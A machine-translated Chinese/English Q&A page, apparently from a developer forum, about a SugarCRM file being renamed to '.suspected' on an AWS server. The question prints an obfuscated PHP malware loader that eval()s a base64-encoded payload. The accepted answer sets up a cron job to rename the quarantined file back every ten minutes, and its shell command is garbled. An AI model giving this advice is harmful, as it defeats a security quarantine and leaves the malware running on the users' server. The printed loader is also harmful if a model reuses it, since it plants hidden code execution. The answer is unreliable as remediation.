問題描述

自過去 4 天以來，我們的生產服務器(AWS EC2 實例)遇到了一個奇怪的問題，僅針對一個站點，即 SugarCRM.

Since last 4 days, we are facing strange issue on our Production server (AWS EC2 instance) specific to only one site which is SugarCRM.

問題是 /home/site_folder/public_html/include/MassUpdate.php 文件被自動重命名為 /home/site_folder/public_html/include/MassUpdate.php.suspected

Issue is /home/site_folder/public_html/include/MassUpdate.php file is renamed automatically to /home/site_folder/public_html/include/MassUpdate.php.suspected

這種情況一天發生 2-3 次，間隔 3-4 小時.此問題僅在特定站點的情況下發生，即使對于同一站點的暫存副本也不會發生.我什至從兩個站點檢查了該文件的代碼，它是相同的.

This happens 2-3 times in a day with 3-4 hours of gap. This issue occurs only in case of specific site, even it doesn't occur for staging replica of the same site. I even checked code of that file from both sites, it's same.

我們通過谷歌搜索發現，此類問題主要發生在 Wordpress 網站上，可能是由于攻擊所致.但是我們檢查了我們的服務器是否受到攻擊，沒有任何攻擊.服務器上也沒有運行病毒/惡意軟件掃描.

We have Googled and found, such issue occurs mostly for Wordpress sites and it could be because of attack. But we checked our server against the attack, there isn't any. Also there is no virus/malware scan running on server.

我們該怎么辦?

更新:通過這個鏈接后，我們發現了一些東西我們執行了 egrep -Rl 'function.*for.*strlen.*isset'/home/username/public_html/ 發現有以下示例代碼的文件很少.

Update: We found few things after going through this link We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ And found that there are few files with following sample code.

    <?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>

似乎是一些惡意軟件，我們如何永久刪除它?

Seems some malware, how we go about removing it permanently?

謝謝

推薦答案

發布此答案，可能對其他人有所幫助.

Posting this answer, it may help others.

1. 在您方便的位置創建一個帶有 '.sh' 擴展名的文件.
2. 在其中添加以下代碼.

#Rename your_file_name.php.suspected 為 your_file_name.phpmv/<path_to_your_file>/your_file_name.php.suspected/<path_to_your_file>/your_file_name.php

1. 保存此文件.
2. 在 crontab 中使用以下行，每 10 分鐘(或您需要的任何時間間隔)設置 cron

*/10 * * * * path_to_cron_file.sh

1. 重啟 crontab 服務.

您將獲得很多關于在 Google 上創建 cron 的文檔.

You will get lot of documentation on creating cron on Google.

這篇關于php 文件自動重命名為 php.suspected的文章就介紹到這了，希望我們推薦的答案對大家有所幫助，也希望大家多多支持html5模板網！